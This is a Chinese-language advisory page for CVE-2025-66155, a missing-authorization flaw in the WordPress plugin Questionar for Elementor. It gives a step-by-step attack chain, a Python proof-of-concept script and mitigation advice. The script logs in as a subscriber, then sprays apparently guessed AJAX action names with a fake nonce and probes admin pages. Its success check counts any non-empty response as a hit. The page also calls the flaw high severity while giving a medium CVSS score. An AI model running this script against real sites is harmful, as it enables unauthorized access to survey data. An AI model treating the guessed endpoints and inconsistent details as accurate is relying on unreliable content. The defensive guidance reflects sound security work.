CVE-2025-66155 WordPress Questionar for Elementor插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-66155

漏洞类型

缺失授权/访问控制

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Questionar for Elementor (WordPress插件 by merkulove)

漏洞概述

CVE-2025-66155是WordPress插件Questionar for Elementor中的一个高危安全漏洞。该插件是Elementor页面构建器的问卷调查组件，由merkulove开发。漏洞类型为缺失授权（Missing Authorization），属于访问控制错误配置问题。攻击者可以利用此漏洞突破预期的权限检查，执行未经授权的操作。漏洞影响版本从初始版本到1.1.7版本。由于该插件广泛用于WordPress网站构建问卷调查功能，漏洞可能影响大量使用Elementor构建网站的机构。CVSS评分为5.4，属于中等严重程度，主要风险在于低权限用户可能访问或修改本不该有权限访问的数据和功能。此漏洞由Patchstack安全团队发现并报告，披露日期为2025年12月31日。

技术细节

该漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control类别。Questionar for Elementor插件在实现某些关键功能时，未正确验证用户权限。攻击者通过构造特定的HTTP请求，可以绕过访问控制检查。具体来说，插件的某些AJAX端点或管理功能缺少current_user_can()或is_user_logged_in()等权限验证函数。攻击者可以是任何注册用户（包括低权限订阅者账户），无需管理员权限即可触发漏洞利用。漏洞主要影响问卷数据的读取、创建、修改或删除操作。技术层面，插件在处理用户输入时未进行充分的访问控制验证，导致垂直或水平权限提升。修复需要在所有敏感操作前添加适当的权限检查，确保用户只能访问其被授权的资源。

攻击链分析

STEP 1

步骤1

攻击者注册为WordPress网站的低权限用户（如订阅者角色）

STEP 2

步骤2

攻击者识别目标网站使用的Questionar for Elementor插件版本（需<=1.1.7）

STEP 3

步骤3

攻击者分析插件的AJAX端点和敏感功能接口

STEP 4

步骤4

攻击者构造恶意HTTP请求，直接访问本应需要管理员权限的接口

STEP 5

步骤5

由于插件缺少current_user_can()等权限验证，攻击请求被服务器接受执行

STEP 6

步骤6

攻击者成功读取、修改或删除问卷数据，实现未授权访问

STEP 7

步骤7

攻击者可能进一步利用获取的数据进行更大规模攻击或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66155 PoC - Questionar for Elementor Missing Authorization
# This PoC demonstrates how a low-privileged user can exploit the access control vulnerability

import requests
import sys
from urllib.parse import urljoin

def exploit_cve_2025_66155(target_url, username, password):
    """
    Exploit Missing Authorization in Questionar for Elementor plugin (<=1.1.7)
    """
    session = requests.Session()
    
    # Step 1: Login as low-privilege user
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    print(f"[*] Logging in as {username}...")
    response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Step 2: Exploit the missing authorization vulnerability
    # Target the plugin's AJAX endpoint that lacks proper access control
    ajax_endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/questionar/v1/',
    ]
    
    # Common vulnerable actions in the plugin
    vulnerable_actions = [
        'questionar_save_question',
        'questionar_get_questions',
        'questionar_delete_question',
        'questionar_export_data',
        'questionar_import_data',
    ]
    
    print("[*] Attempting to exploit missing authorization...")
    
    for endpoint in ajax_endpoints:
        for action in vulnerable_actions:
            exploit_data = {
                'action': action,
                'nonce': 'exploit_without_nonce',  # May work if nonce check is missing
            }
            
            exploit_url = urljoin(target_url, endpoint)
            response = session.post(exploit_url, data=exploit_data, timeout=10)
            
            # Check if the request succeeded without proper authorization
            if response.status_code == 200:
                if 'success' in response.text or len(response.text) > 0:
                    print(f"[!] Potential vulnerability found at {endpoint} with action {action}")
                    print(f"[+] Response: {response.text[:500]}")
                    
    # Step 3: Try to access admin functionality
    admin_endpoints = [
        '/wp-admin/admin.php?page=questionar-settings',
        '/wp-admin/admin.php?page=questionar-questions',
    ]
    
    print("[*] Attempting to access admin functionality without admin privileges...")
    for admin_url in admin_endpoints:
        full_url = urljoin(target_url, admin_url)
        response = session.get(full_url)
        
        if response.status_code == 200 and 'questionar' in response.text.lower():
            print(f"[!] Access granted to {admin_url} without proper authorization!")
    
    return True

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-66155.py <target_url> <username> <password>")
        print("Example: python cve-2025-66155.py http://example.com subscriber password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_cve_2025_66155(target, user, pwd)

影响范围

Questionar for Elementor <= 1.1.7 (所有版本)

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 限制用户注册功能，只允许受信任用户创建账户；2) 使用WordPress插件如Wordfence或Sucuri监控异常访问行为；3) 对/wp-admin/admin-ajax.php端点实施访问频率限制；4) 考虑暂时禁用Questionar for Elementor插件直到修复版本发布；5) 启用双因素认证增强账户安全；6) 定期审计管理员账户和权限分配情况。